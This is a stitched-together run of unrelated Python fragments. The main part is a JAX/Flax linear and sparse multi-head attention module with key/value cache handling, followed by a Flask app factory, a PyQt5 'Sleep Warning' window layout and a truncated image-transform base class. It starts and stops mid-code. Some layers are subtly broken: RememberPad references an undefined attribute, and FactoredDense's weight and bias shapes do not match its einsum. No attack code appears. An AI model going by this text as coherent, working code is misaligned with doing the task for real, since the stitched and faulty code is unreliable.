prefix. cached_key_value = key_cached * key_mask cached_value_value = value_cached * value_mask return (key, value, cur_index, cached_key_value, cached_value_value, prefill_lengths) def update_cache_decode( self, key: Array, value: Array, cached_key: variables.Variable, cached_value: variables.Variable, cache_index: variables.Variable ) -> Tuple[Array, Array, Array, Array, Array, Array]: """Update the next timestep in the autoregressive cache. This is used during step by step decoding where each key and value we get are a single (the next) timestep. Args: key: The calculated key used in attention. [batch..., 1, num_heads, features_per_head] value: The calculated value used in attention. [batch..., 1, num_heads, features_per_head] cached_key: The cache of previous keys. [batch..., num_heads, features_per_head, length] cached_value: The cache of previous values. [batch..., num_heads, features_per_head, length] cache_index: The timestep that we are currently calculating the key and value for. [batch] if we are decoding after doing a prefill or [1] if we are starting with step-by-step decoding. Returns: The key, value, and the last timestep we just filled in the cache. Note: this index is the last timestep we just fill, the actual value of the `cache_index` is already increased to point to the next timestep to fill. We also return the new cache values for now because assigning to a variable inside of a method doesn't work. These returns will be removed eventually. """ cache_length = cached_key.value.shape[-1] # Create a OHE of the current index. NOTE: the index is increased # below. # Note: We reshape the index into a column vector so that it will work # if the index is a scalar or a vector with different cache positions # from different elements in a batch. cur_index = jnp.reshape(cache_index.value, (-1,)) one_hot_indices = jax.nn.one_hot(cur_index, cache_length, dtype=key.dtype) # In order to update the key, value caches with the current key and # value, we move the length axis to the back, similar to what we did # for the cached ones above. # Note these are currently the key and value of a single position, # since we feed one position at a time. one_token_key = jnp.moveaxis(key, -3, -1) one_token_value = jnp.moveaxis(value, -3, -1) # The one hot indices are now either [1, length] for a scalar index or # [batch size, length] for examples where there are different lengths # of prefixes. We need to add dims for num_heads and num_features as # broadcasting doesn't work for the batched version. one_hot_indices = jnp.expand_dims( jnp.expand_dims(one_hot_indices, axis=1), axis=1) # Update key, value caches with our new 1d spatial slices. # We implement an efficient scatter into the cache via one-hot # broadcast and addition. # Key/Value have seq lengths of 1 while one_hot has a seq_length # of length. key/value will broadcast their value to each timestep # and the onehot will mask all but the correct timesteps. key = cached_key.value + one_token_key * one_hot_indices value = cached_value.value + one_token_value * one_hot_indices cached_key_value = key cached_value_value = value cache_index_value = cache_index.value + 1 # Move the keys and values back to their original shapes. key = jnp.moveaxis(key, -1, -3) value = jnp.moveaxis(value, -1, -3) return (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) @nn.compact def __call__(self, inputs_q: Array, inputs_kv: Array, mask: Optional[Array] = None, bias: Optional[Array] = None, *, precomputed_qkv: Optional[Array] = None, decode: bool = False, enable_dropout: bool = True, prefill: bool = False, prefill_lengths: Optional[Array] = None) -> Array: """Applies multi-head dot product attention on the input data. Projects the inputs into multi-headed query, key, and value vectors, applies dot-product attention and project the results to an output vector. There are two modes: decoding and non-decoding (e.g., training). The mode is determined by `decode`. During decoding mode, this method is called twice, by `init` and `apply`. In the former, inputs_q: [batch..., length, qkv_features] and inputs_kv: [batch..., length, qkv_features] During apply, query, key and value all have the shape: [batch * beam, 1, qkv_features] where the batch dimension is added to include multiple beams. Note that the batch dimension is different during the init and apply calls. This is because the cached variables are directly passed-in during `apply` method. In other words, the cache variables such as `cached_key` are initialized with `batch` dim, expanded by tiling in the beam search function to `batch * beam` dimension, and passed to the `apply` method as part of a variable dict. Args: inputs_q: input queries of shape `[batch_sizes..., q_length, q_features]`. inputs_kv: key/values of shape `[batch_sizes..., kv_length, kv_features]`. mask: attention mask of shape `[batch_sizes..., {1, num_heads}, q_length, kv_length]`. bias: attention bias of shape `[batch_sizes..., num_heads, q_length, kv_length]`. precomputed_qkv: when using fused implementations QKVO are defined outside this module and we only use the module to run computations. decode: Whether to prepare and use an autoregressive cache. enable_dropout: Enables dropout if set to True. prefill: Whether to run a partial sequence to prefill the cache. prefill_lengths: The length of each partial sequence we are filling in the cache, lengths are inferred from the mask if not provided. Returns: If output_projection is True, then output of shape `[batch_sizes..., length, out_features]`, where out_features is set to features if not provided. If output_projection is False, then output of shape `[batch_sizes..., length, qkv_features]`, where qkv_features is set to features if not provided. """ validate_linear_attention_call_parameter_shapes(inputs_q, inputs_kv, mask, bias, self.num_heads) if precomputed_qkv is not None: raise ValueError('Support for precomputed QKVO not implemented.') rotary_index = None features = self.out_features or inputs_q.shape[-1] qkv_features = self.qkv_features or inputs_q.shape[-1] if self.head_dim is None: head_dim = qkv_features // self.num_heads else: head_dim = self.head_dim if self.kernels_to_fuse and not self.split_head_kernel: raise ValueError('Un-reshaped kernels are required when using QKV fused ' 'kernel optimization.') # Is attention logit rescaling explicit or folded into initializer? if self.rescale_logits: query_init = self.kernel_init else: if self.kernels_to_fuse: raise ValueError('Cannot fold in logit normalization to query ' 'initializer when using fused kernels.') depth_scaling = jnp.sqrt(head_dim).astype(self.dtype) query_init = lambda *args: self.kernel_init(*args) / depth_scaling make_dense = functools.partial( dense.DenseGeneral, axis=-1, bias_init=self.bias_init, use_bias=self.use_bias, dtype=self.dtype, precision=self.precision, reshape_kernel=not self.split_head_kernel, ) # Project inputs_q to multi-headed q/k/v # dimensions are then [batch..., length, num_heads, features_per_head] if self.kernels_to_fuse is None: query = make_dense( kernel_init=query_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='query')( inputs_q) key = make_dense( kernel_init=self.kernel_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='key')( inputs_kv) value = make_dense( kernel_init=self.kernel_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='value')( inputs_kv) # TODO: should we fuse/slice along depth or head dim? elif self.kernels_to_fuse == 'qkv': if inputs_q is not inputs_kv: raise ValueError('qkv fusion is only supported in self-attention mode ' '(when inputs_q is inputs_kv).') # 'qkv' fusion mode implies self-attention qkv = make_dense( kernel_init=self.kernel_init, features=(3, self.num_heads, head_dim), kernel_axis_names=['embed', 'unmodeled', 'heads', 'head_dim'], name='qkv_fused')( inputs_q) query = jnp.squeeze(lax.dynamic_slice_in_dim(qkv, 0, 1, -3), -3) key = jnp.squeeze(lax.dynamic_slice_in_dim(qkv, 1, 1, -3), -3) value = jnp.squeeze(lax.dynamic_slice_in_dim(qkv, 2, 1, -3), -3) elif self.kernels_to_fuse == 'kv': query = make_dense( kernel_init=query_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='query')( inputs_q) kv = make_dense( kernel_init=self.kernel_init, features=(2, self.num_heads, head_dim), kernel_axis_names=['embed', 'unmodeled', 'heads', 'head_dim'], name='kv_fused')( inputs_kv) key = jnp.squeeze(lax.dynamic_slice_in_dim(kv, 0, 1, -3), -3) value = jnp.squeeze(lax.dynamic_slice_in_dim(kv, 1, 1, -3), -3) else: raise ValueError('Incorrect kernel fusion mode specified.') if self.sharding_over_head_dimension: query = activation_partitioning.with_sharding(query, 2) key = activation_partitioning.with_sharding(key, 2) value = activation_partitioning.with_sharding(value, 2) query: Array = query # hint to quiet pytype. key: Array = key value: Array = value if prefill and decode: raise ValueError('prefill and decode cannot both be true at the same' 'time. If you are using a prefix LM with bidirectional ' 'attention on the inputs, please make a call with ' 'prefill=True that includes an attention mask that ' 'covers your inputs first and then make your decoding ' 'calls.') if prefill or decode: # Detect if we're initializing by absence of existing cache data. is_initialized = self.has_variable('cache', 'cached_key') # The key and value have dimension # [batch..., length, num_heads, features_per_head], but we cache them as # [batch..., num_heads, features_per_head, length] as a TPU fusion # optimization. This also enable the "scatter via one-hot broadcast" # trick, which means we do a one-hot broadcast instead of a scatter/gather # operations, which gives a 3-4x speedup in practice. swap_dims = lambda x: x[:-3] + tuple(x[i] for i in [-2, -1, -3]) cached_key = self.variable('cache', 'cached_key', jnp.zeros, swap_dims(key.shape), key.dtype) cached_value = self.variable('cache', 'cached_value', jnp.zeros, swap_dims(value.shape), value.dtype) cache_index = self.variable('cache', 'cache_index', lambda: jnp.array(0, dtype=jnp.int32)) rotary_index = cache_index.value if is_initialized: # Here we are in "apply()". *batch_dims, num_heads, features_per_head, length = ( cached_key.value.shape) if prefill: if prefill_lengths is None: # Figure out how far each element in the batch fills the cache based # on the mask. We index each element in the batch, the first head # dim (because this is always set to one), and the first query # vector. If there is any prefix at all, the first element in the # prefix would be part of it. raise NotImplementedError # TODO(tomprom) prefill_lengths = jnp.sum( mask[:, 0, 0, :], axis=-1).astype(cache_index.value.dtype) (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) = self.update_cache_prefill( key, value, cached_key, cached_value, cache_index, prefill_lengths) # During fast autoregressive decoding, we feed one position at a time, # and cache the keys and values step by step. elif decode: # Check the shape of the cached key against the input query. expected_shape = tuple(batch_dims) + (1, num_heads, features_per_head) if expected_shape != query.shape: raise ValueError('Autoregressive cache shape error, ' 'expected query shape %s instead got %s.' % (expected_shape, query.shape)) (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) = self.update_cache_decode( key, value, cached_key, cached_value, cache_index) # NB: While decoding, we rely on a causal mask implementation in the # linear attention_fn # Currently, updating a variable inside of a method is not handled # in flax, so we return the actual values and assign them in the main # compacted call for now. # TODO: Move variable assignment inside of the # cache update functions once variable references are tracked across # transform boundaries. cache_index.value = cache_index_value cached_key.value = cached_key_value cached_value.value = cached_value_value # Mask the key and value with the attention mask if mask is not None: if mask.shape[1] > 1: key = jnp.einsum('...hl,...lhd->...lhd', mask, key) value = jnp.einsum('...hl,...lhd->...lhd', mask, value) else: key = jnp.einsum('...xl,...lhd->...lhd', mask, key) value = jnp.einsum('...xl,...lhd->...lhd', mask, value) dropout_rng = None if enable_dropout and self.dropout_rate > 0.: dropout_rng = self.make_rng('dropout') if self.use_rotary_embedding: # use rotary embeddings before attention # https://arxiv.org/abs/2104.09864 # TODO: Put it in a new class dim = query.shape[-1] max_length = max(query.shape[1], key.shape[1]) sin, cos = embedding.generate_fixed_pos_embedding( dim, max_length, max_timescale=self.rotary_embedding_max_timescale) query, key = embedding.apply_rotary_embedding( query, key, cos, sin, batch_size=inputs_q.shape[0], num_heads=self.num_heads, decode=decode, rotary_index=rotary_index) # Compute and apply attention (at the same time). if self.rescale_logits or self.use_extra_logit or self.float32_logits: # TODO: Implement these in FAVOR+ so they can be used here raise NotImplementedError if enable_dropout and self.dropout_rate > 0.: raise NotImplementedError x = self.attention_fn( query, key, value, broadcast_dropout=self.broadcast_dropout, # rescale_logits=self.rescale_logits, dropout_rng=dropout_rng, dropout_rate=self.dropout_rate, # enable_dropout=enable_dropout, dtype=self.dtype, precision=self.precision, # use_extra_logit=self.use_extra_logit, # float32_logits=self.float32_logits ) # pytype: disable=wrong-keyword-args if not self.output_projection: return x # Back to the original inputs dimensions. out = dense.DenseGeneral( features=features, axis=(-2, -1), kernel_init=self.kernel_init, bias_init=self.bias_init, use_bias=self.use_bias, dtype=self.dtype, precision=self.precision, reshape_kernel=not self.split_head_kernel, kernel_axis_names=['heads', 'head_dim', 'embed'], name='out')( # pytype: disable=wrong-arg-types x) return out class FactoredDense(nn.Module): n_modules: int d_out: Optional[int] = None use_bias: bool = True use_bfloat16 = False @nn.compact def call(self, x, decode: bool = False, enable_dropout: bool = True): r"""Returns a Dense-like layer, internally factored to use fewer parameters. This layer treats an activation vector as if divided into :math:`M` subvectors (``n_modules`` 'modules'). It uses this factored view to compute a :py:class:`Dense`-like mapping with high mixing/connectivity, but using approximately :math:`1/M` the number of weights of a similarly dimensioned :py:class:`Dense` layer. More specifically, each activation vector of dimensionality ``n_in`` is multiplied element-wise (a generalized form of gating) with ``n_modules`` vectors also of dimensionality ``n_in``. The resulting vectors are projected to the subvector/module dimensionality ``d_out / n_modules`` via a matrix multiply, and finally reshaped back to a single vector of dimensionality ``d_out``. Optionally, a bias vector of dimensionality ``d_out`` is added at the end. All the above-mentioned non-input objects -- gating vectors, projection matrix, and optional bias -- are trainable weights. Args: n_modules: Number by which an activation vector is divided into subvectors (modules) for the factored computation. d_in: Last/innermost dimension of input array. d_out: Last/innermost dimension of output array. use_bias: If True, add bias vectors at the end of the layer; else end the layer with the matrix multiply. use_bfloat16: If True, use bfloat16 weights; else use float32 weights. """ d_in = x.shape[-1] if self.d_out is None: d_out = d_in else: d_out = self.d_out if d_out % self.n_modules != 0: raise ValueError(f'Value d_out ({d_out}) must be a multiple of arg ' f'n_modules ({self.n_modules}).') d_module = d_out // self.n_modules gating = self.param('gating', flax.linen.initializers.normal(0.5), [self.n_modules, d_in], x.dtype) projection = self.param('projection', flax.linen.initializers.glorot_uniform(), [self.n_modules, d_in], x.dtype) x = jnp.einsum('...d,nd,dm->...nm', x, gating, projection) x = jnp.reshape(x, tuple(x.shape)[:-2] + (-1,)) if self.use_bias: bias = self.param('bias', flax.linen.initializers.normal(1e-6), [self.n_modules, d_in], x.dtype) x += bias return x class RememberPad(nn.Module): n_items_to_remember: int @nn.compact def call(self, x, decode: bool = False, enable_dropout: bool = True): if self._n_items_to_remember == 0: return x if decode: raise NotImplementedError else: pad_widths = [[0, 0] for _ in range(len(x.shape))] pad_widths[1][0] = self.n_items_to_remember x = jnp.pad(x, pad_width=pad_widths, mode='constant') return x class LocallyConvDense(nn.Module): n_modules: int n_units: int kernel_size: int = 1 length_kernel_size: int = 1 @nn.compact def call(self, x, decode: bool = False, enable_dropout: bool = True,): """Layer using local convolutions for approximation of Dense layer. The layer splits the last axis of a tensor into `n_modules`, then runs a convolution on all those modules, and concatenates their results. It is similar to LocallyConnectedDense above, but shares weights. Args: n_modules: Indicates how many modules (pixels) should be input and output split into for processing. n_units: how many outputs (filters) should each module generate. mode: One of `'train'`, `'eval'`, or `'predict'`. kernel_size: The size of the kernel to be used. length_kernel_size: If > 1, also do causal convolution on the previous axis, which is often the sentence length in sequence models. Returns: LocallyConvDense tl.Layer. """ if decode: # Prediction mode is not yet implemented for the convolution layer # It required "remembering" the last few tokens raise NotImplementedError if self.n_modules == 1: return dense.DenseGeneral(self.n_units) if self.kernel_size % 2 != 1: raise ValueError('Currently we only handle odd kernel sizes.') half = (self.kernel_size - 1) // 2 pad_widths = [[0, 0], [0, 0], [half, half], [0, 0]] x = jnp.reshape(x, tuple(x.shape)[:-1] + (self.n_modules, -1)) x = jnp.pad(x, pad_width=pad_widths, mode='constant') x = RememberPad(n_items_to_remember=self.length_kernel_size - 1)(x) x = nn.Conv(self.n_units, kernel_size=(self.length_kernel_size, self.kernel_size))(x) x = jnp.reshape(x, tuple(x.shape)[:-2] + (-1,)) return x class MultiHeadSparseLinearAttention(MultiHeadLinearAttention): """Multi-head linear attention with sparse QKV calculations. See: https://arxiv.org/abs/2111.12763 Attributes: num_heads: number of attention heads. Features (i.e. inputs_q.shape[-1]) should be divisible by the number of heads. use_bias: bool: whether pointwise QKVO dense transforms use bias. dtype: the dtype of the computation (default: float32) qkv_features: dimension of the key, query, and value. head_dim: dimension of each head. If unspecified, it defaults to qkv_features // num_heads. out_features: dimension of the last projection broadcast_dropout: bool: use a broadcasted dropout along batch dims. dropout_rate: dropout rate precision: numerical precision of the computation see `jax.lax.Precision` for details. kernel_init: initializer for the kernel of the Dense layers. bias_init: initializer for the bias of the Dense layers. attention_fn: dot_product_attention or compatible function. Accepts query, key, value, and returns output of shape `[bs, dim1, dim2, ..., dimN,, num_heads, value_channels]`` use_extra_logit: whether to include a virtual extra logit equal to zero. float32_logits: bool, if True then compute logits in float32 to avoid numerical issues with bfloat16. output_projection: Project the output of `attention_fn` to `out_features`. If False, returns the output of `attention_fn` without a projection. split_head_kernel: whether to store QKVO variables with a split head dimension. kernels_to_fuse: Which kernels to fuse, if any. use_rotary_embedding: whether to use rotary embeddings. """ @nn.compact def __call__(self, inputs_q: Array, inputs_kv: Array, mask: Optional[Array] = None, bias: Optional[Array] = None, *, precomputed_qkv: Optional[Array] = None, decode: bool = False, enable_dropout: bool = True, prefill: bool = False, prefill_lengths: Optional[Array] = None) -> Array: """Applies multi-head dot product attention on the input data. Projects the inputs into multi-headed query, key, and value vectors, applies dot-product attention and project the results to an output vector. There are two modes: decoding and non-decoding (e.g., training). The mode is determined by `decode`. During decoding mode, this method is called twice, by `init` and `apply`. In the former, inputs_q: [batch..., length, qkv_features] and inputs_kv: [batch..., length, qkv_features] During apply, query, key and value all have the shape: [batch * beam, 1, qkv_features] where the batch dimension is added to include multiple beams. Note that the batch dimension is different during the init and apply calls. This is because the cached variables are directly passed-in during `apply` method. In other words, the cache variables such as `cached_key` are initialized with `batch` dim, expanded by tiling in the beam search function to `batch * beam` dimension, and passed to the `apply` method as part of a variable dict. Args: inputs_q: input queries of shape `[batch_sizes..., q_length, q_features]`. inputs_kv: key/values of shape `[batch_sizes..., kv_length, kv_features]`. mask: attention mask of shape `[batch_sizes..., {1, num_heads}, q_length, kv_length]`. bias: attention bias of shape `[batch_sizes..., num_heads, q_length, kv_length]`. precomputed_qkv: when using fused implementations QKVO are defined outside this module and we only use the module to run computations. decode: Whether to prepare and use an autoregressive cache. enable_dropout: Enables dropout if set to True. prefill: Whether to run a partial sequence to prefill the cache. prefill_lengths: The length of each partial sequence we are filling in the cache, lengths are inferred from the mask if not provided. Returns: If output_projection is True, then output of shape `[batch_sizes..., length, out_features]`, where out_features is set to features if not provided. If output_projection is False, then output of shape `[batch_sizes..., length, qkv_features]`, where qkv_features is set to features if not provided. """ validate_linear_attention_call_parameter_shapes(inputs_q, inputs_kv, mask, bias, self.num_heads) if precomputed_qkv is not None: raise ValueError('Support for precomputed QKVO not implemented.') rotary_index = None features = self.out_features or inputs_q.shape[-1] qkv_features = self.qkv_features or inputs_q.shape[-1] if self.head_dim is None: head_dim = qkv_features // self.num_heads else: head_dim = self.head_dim if self.kernels_to_fuse: raise ValueError('Fused kernels are not supported with sparse attention') if self.kernels_to_fuse and not self.split_head_kernel: raise ValueError('Un-reshaped kernels are required when using QKV fused ' 'kernel optimization.') # Is attention logit rescaling explicit or folded into initializer? if self.rescale_logits: query_init = self.kernel_init else: if self.kernels_to_fuse: raise ValueError('Cannot fold in logit normalization to query ' 'initializer when using fused kernels.') depth_scaling = jnp.sqrt(head_dim).astype(self.dtype) query_init = lambda *args: self.kernel_init(*args) / depth_scaling make_dense = functools.partial( dense.DenseGeneral, axis=-1, bias_init=self.bias_init, use_bias=self.use_bias, dtype=self.dtype, precision=self.precision, reshape_kernel=not self.split_head_kernel, ) # Project inputs_q to multi-headed q/k/v # dimensions are then [batch..., length, num_heads, features_per_head] query = make_dense( kernel_init=query_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='query')( inputs_q) key = make_dense( kernel_init=self.kernel_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='key')( inputs_kv) value = make_dense( kernel_init=self.kernel_init, features=(self.num_heads, head_dim), kernel_axis_names=['embed', 'heads', 'head_dim'], name='value')( inputs_kv) if self.sharding_over_head_dimension: query = activation_partitioning.with_sharding(query, 2) key = activation_partitioning.with_sharding(key, 2) value = activation_partitioning.with_sharding(value, 2) query: Array = query # hint to quiet pytype. key: Array = key value: Array = value if prefill and decode: raise ValueError('prefill and decode cannot both be true at the same' 'time. If you are using a prefix LM with bidirectional ' 'attention on the inputs, please make a call with ' 'prefill=True that includes an attention mask that ' 'covers your inputs first and then make your decoding ' 'calls.') if prefill or decode: # Detect if we're initializing by absence of existing cache data. is_initialized = self.has_variable('cache', 'cached_key') # The key and value have dimension # [batch..., length, num_heads, features_per_head], but we cache them as # [batch..., num_heads, features_per_head, length] as a TPU fusion # optimization. This also enable the "scatter via one-hot broadcast" # trick, which means we do a one-hot broadcast instead of a scatter/gather # operations, which gives a 3-4x speedup in practice. swap_dims = lambda x: x[:-3] + tuple(x[i] for i in [-2, -1, -3]) cached_key = self.variable('cache', 'cached_key', jnp.zeros, swap_dims(key.shape), key.dtype) cached_value = self.variable('cache', 'cached_value', jnp.zeros, swap_dims(value.shape), value.dtype) cache_index = self.variable('cache', 'cache_index', lambda: jnp.array(0, dtype=jnp.int32)) rotary_index = cache_index.value if is_initialized: # Here we are in "apply()". *batch_dims, num_heads, features_per_head, length = ( cached_key.value.shape) if prefill: if prefill_lengths is None: # Figure out how far each element in the batch fills the cache based # on the mask. We index each element in the batch, the first head # dim (because this is always set to one), and the first query # vector. If there is any prefix at all, the first element in the # prefix would be part of it. raise NotImplementedError # TODO(tomprom) prefill_lengths = jnp.sum( mask[:, 0, 0, :], axis=-1).astype(cache_index.value.dtype) (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) = self.update_cache_prefill( key, value, cached_key, cached_value, cache_index, prefill_lengths) # During fast autoregressive decoding, we feed one position at a time, # and cache the keys and values step by step. elif decode: # Check the shape of the cached key against the input query. expected_shape = tuple(batch_dims) + (1, num_heads, features_per_head) if expected_shape != query.shape: raise ValueError('Autoregressive cache shape error, ' 'expected query shape %s instead got %s.' % (expected_shape, query.shape)) (key, value, cur_index, cached_key_value, cached_value_value, cache_index_value) = self.update_cache_decode( key, value, cached_key, cached_value, cache_index) # NB: While decoding, we rely on a causal mask implementation in the # linear attention_fn # Currently, updating a variable inside of a method is not handled # in flax, so we return the actual values and assign them in the main # compacted call for now. # TODO: Move variable assignment inside of the # cache update functions once variable references are tracked across # transform boundaries. cache_index.value = cache_index_value cached_key.value = cached_key_value cached_value.value = cached_value_value # Mask the key and value with the attention mask if mask is not None: if mask.shape[1] > 1: key = jnp.einsum('...hl,...lhd->...lhd', mask, key) value = jnp.einsum('...hl,...lhd->...lhd', mask, value) else: key = jnp.einsum('...xl,...lhd->...lhd', mask, key) value = jnp.einsum('...xl,...lhd->...lhd', mask, value) dropout_rng = None if enable_dropout and self.dropout_rate > 0.: dropout_rng = self.make_rng('dropout') if self.use_rotary_embedding: # use rotary embeddings before attention # https://arxiv.org/abs/2104.09864 # TODO: Put it in a new class dim = query.shape[-1] max_length = max(query.shape[1], key.shape[1]) sin, cos = embedding.generate_fixed_pos_embedding( dim, max_length, max_timescale=self.rotary_embedding_max_timescale) query, key = embedding.apply_rotary_embedding( query, key, cos, sin, batch_size=inputs_q.shape[0], num_heads=self.num_heads, decode=decode, rotary_index=rotary_index) # Compute and apply attention (at the same time). if self.rescale_logits or self.use_extra_logit or self.float32_logits: # TODO: Implement these in FAVOR+ so they can be used here raise NotImplementedError if enable_dropout and self.dropout_rate > 0.: raise NotImplementedError x = self.attention_fn( query, key, value, broadcast_dropout=self.broadcast_dropout, # rescale_logits=self.rescale_logits, dropout_rng=dropout_rng, dropout_rate=self.dropout_rate, # enable_dropout=enable_dropout, dtype=self.dtype, precision=self.precision, # use_extra_logit=self.use_extra_logit, # float32_logits=self.float32_logits ) # pytype: disable=wrong-keyword-args if not self.output_projection: return x # Back to the original inputs dimensions. out = dense.DenseGeneral( features=features, axis=(-2, -1), kernel_init=self.kernel_init, bias_init=self.bias_init, use_bias=self.use_bias, dtype=self.dtype, precision=self.precision, reshape_kernel=not self.split_head_kernel, kernel_axis_names=['heads', 'head_dim', 'embed'], name='out')( # pytype: disable=wrong-arg-types x) return out def validate_linear_attention_call_parameter_shapes(inputs_q: Array, inputs_kv: Array, mask: Optional[Array], bias: Optional[Array], num_heads: Optional[int]): """Validates the shapes of parameters to DenseAttention call methods.""" if inputs_q.ndim != inputs_kv.ndim: raise ValueError(f'Mismatched inputs rank: expected ' f'inputs_q.ndim ({inputs_q.ndim}) == ' f'inputs_kv.ndim ({inputs_kv.ndim})') if inputs_q.ndim < 3: raise ValueError(f'Expected rank of inputs >= 3, was {inputs_q.ndim}') if inputs_q.shape[:-3] != inputs_kv.shape[:-3]: raise ValueError(f'Mismatched batch dims: expected ' f'inputs_q.shape[:-3] ({inputs_q.shape[:-3]}) == ' f'inputs_kv.shape[:-3] ({inputs_kv.shape[:-3]})') if mask is not None: if mask.ndim != inputs_kv.ndim: raise ValueError(f'Mismatched ranks: expected ' f'mask.ndim ({mask.ndim}) to be equal to ' f'inputs_kv.ndim ({inputs_kv.ndim})') if num_heads is not None: if mask.shape[-2] not in (1, num_heads): raise ValueError(f'Mismatched num_heads: expected ' f'mask.shape[-2] ({mask.shape[-2]}) == ' f'num_heads ({num_heads}), or 1') else: num_heads = mask.shape[-2] if mask.shape[-1] != inputs_kv.shape[-2]: raise ValueError(f'Mismatched kv_length: expected ' f'mask.shape[-1] ({mask.shape[-1]}) == ' f'inputs_kv.shape[-2] ({inputs_kv.shape[-2]})') if bias is not None: raise ValueError('Bias must be None in linear attention.') 0 from flask import Flask from flask_sqlalchemy import SQLAlchemy from flask_jwt_extended import JWTManager from config import config db = SQLAlchemy() jwt = JWTManager() def create_app(env): app = Flask(__name__) app.config.from_object(config[env]) config[env].init_app(app) if app.config['SSL_REDIRECT']: from flask_sslify import SSLify sslify = SSLify(app) db.init_app(app) jwt.init_app(app) from .graphql import graphql as graphql_blueprint app.register_blueprint(graphql_blueprint, url_prefix='/api') return app from energyforecast import * from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtGui import * from PyQt5.QtCore import * from PyQt5.QtWidgets import * class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(915, 600) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") self.camera_button = QtWidgets.QPushButton(self.centralwidget) self.camera_button.setGeometry(QtCore.QRect(30, 100, 200, 60)) self.video_button = QtWidgets.QPushButton(self.centralwidget) self.video_button.setGeometry(QtCore.QRect(30, 220, 200, 60)) self.about_button = QtWidgets.QPushButton(self.centralwidget) self.about_button.setGeometry(QtCore.QRect(30, 340, 200, 60)) self.exit_button = QtWidgets.QPushButton(self.centralwidget) self.exit_button.setGeometry(QtCore.QRect(30, 460, 200, 60)) self.label = QtWidgets.QLabel(self.centralwidget) self.label.setGeometry(QtCore.QRect(30, 10, 200, 60)) self.camera_label = QtWidgets.QLabel(self.centralwidget) self.camera_label.setGeometry(QtCore.QRect(250, 100, 640, 480)) self.score_label = QtWidgets.QLabel(self.centralwidget) self.score_label.setGeometry(QtCore.QRect(480, 30, 200, 60)) MainWindow.setCentralWidget(self.centralwidget) self.statusbar = QtWidgets.QStatusBar(MainWindow) self.statusbar.showMessage("By gorgeousdays") MainWindow.setStatusBar(self.statusbar) self.set_style(MainWindow) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) def set_style(self,MainWindow): self.camera_button.setStyleSheet('''QPushButton{background:rgb(106,118,200);border-radius:5px;color:white;font-family:AdobeHeitiStd;font-size:25px} QPushButton:hover{background:rgb(106,118,200);} QPushButton:pressed{background-color:rgb(106,118,200)}''') self.video_button.setStyleSheet('''QPushButton{background:rgb(106,118,200);border-radius:5px;color:white;font-family:AdobeHeitiStd;font-size:25px} QPushButton:hover{background:rgb(106,118,200);} QPushButton:pressed{background-color:rgb(106,118,200)}''') self.about_button.setStyleSheet('''QPushButton{background:rgb(106,118,200);border-radius:5px;color:white;font-family:AdobeHeitiStd;font-size:25px} QPushButton:hover{background:rgb(106,118,200);} QPushButton:pressed{background-color:rgb(106,118,200)}''') self.exit_button.setStyleSheet('''QPushButton{background:rgb(106,118,200);border-radius:5px;color:white;font-family:AdobeHeitiStd;font-size:25px} QPushButton:hover{background:rgb(106,118,200);} QPushButton:pressed{background-color:rgb(106,118,200)}''') self.label.setAlignment(Qt.AlignCenter) self.label.setFont(QFont("Century",30,QFont.Bold)) pe = QPalette() pe.setColor(QPalette.WindowText,QColor(139,147, 194, 250)) self.label.setPalette(pe) self.score_label.setFont(QFont("Century",20,QFont.Bold)) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "Sleep Warning")) self.camera_button.setText(_translate("MainWindow", "打开相机")) self.video_button.setText(_translate("MainWindow", "上传视频")) self.about_button.setText(_translate("MainWindow", "关于")) self.exit_button.setText(_translate("MainWindow", "退出")) self.label.setText(_translate("MainWindow", "MENU")) self.camera_label.setText(_translate("MainWindow", "请先打开摄像头")) self.score_label.setText(_translate("MainWindow", "Points")) import os import numbers import copy from abc import ABC, abstractmethod import torch from dmt.data.samples.sample import Sample from dmt.transforms.harmonizer import ImageHarmonizer from dmt.utils.parse import parse_bool, parse_probability from dmt.constants import ( INTERPOLATIONS_2_SITK_INTERPOLATIONS as interpolations_d ) class Transform(ABC): """ Abstract & base class for all image transforms. Implementation Structure: - all subclasses must define apply (opt. invertible) function - base class has parsing functions (input checking & processing) Transform inputs can be: 1. Raw Images: np.ndarray, torch.Tensor, PIL.Image, SimpleITK.Image 2. Containers: rere.Image Args: p: Probability that this transform will be applied. copy: Make a shallow copy of the input before applying the transform. include_keys: Key names in samples that will be transformed if they are images. exclude_keys: Key names in samples that will be ignored. """ ### ------ # Main API & Transformation Functionality # ----- ### def __init__(self, p=1.0, copy=True, include_keys=None, exclude_keys=None): self.p = parse_probability(p) self.copy = parse_bool(copy) keys = Sample._parse_include_exclude_keys(include_keys, exclude_keys) self.include_keys, self.exclude_keys = keys self.transform_args = () # for reproducibility; updated in subclasses def __call__(self, data, include_keys=None, exclude_keys=None): """ Handles functionality for all transforms: 1. Determine if transform should be applied given probability. 2. Standardize the image types given via a DataHarmonizer 3. Copy sample if necessary. 4. Transform the sample (rewrites new data to sample) 5. Record the transformation arguments into new sample. Args: data: Can be a Sample, Image, Harmonizer, Torch tensor, Numpy array, or SimpleITK Image. Returns: Transformed image(s) in the original type given. """ if torch.rand(1).item() > self.p: return data keys = include_keys, exclude_keys include_keys, exclude_keys = Sample._parse_include_exclude_keys(*keys) # overwrites keys specified in init if given here final_include_keys = self.include_keys if include_keys: final_include_keys = include_keys final_exclude_keys = self.exclude_keys if exclude_keys: final_exclude_keys = exclude_keys harmonizer = ImageHarmonizer(data) sample = harmonizer.get_sample() if self.copy: sample = copy.copy(sample) transformed_sample = self.apply_transform(sample) 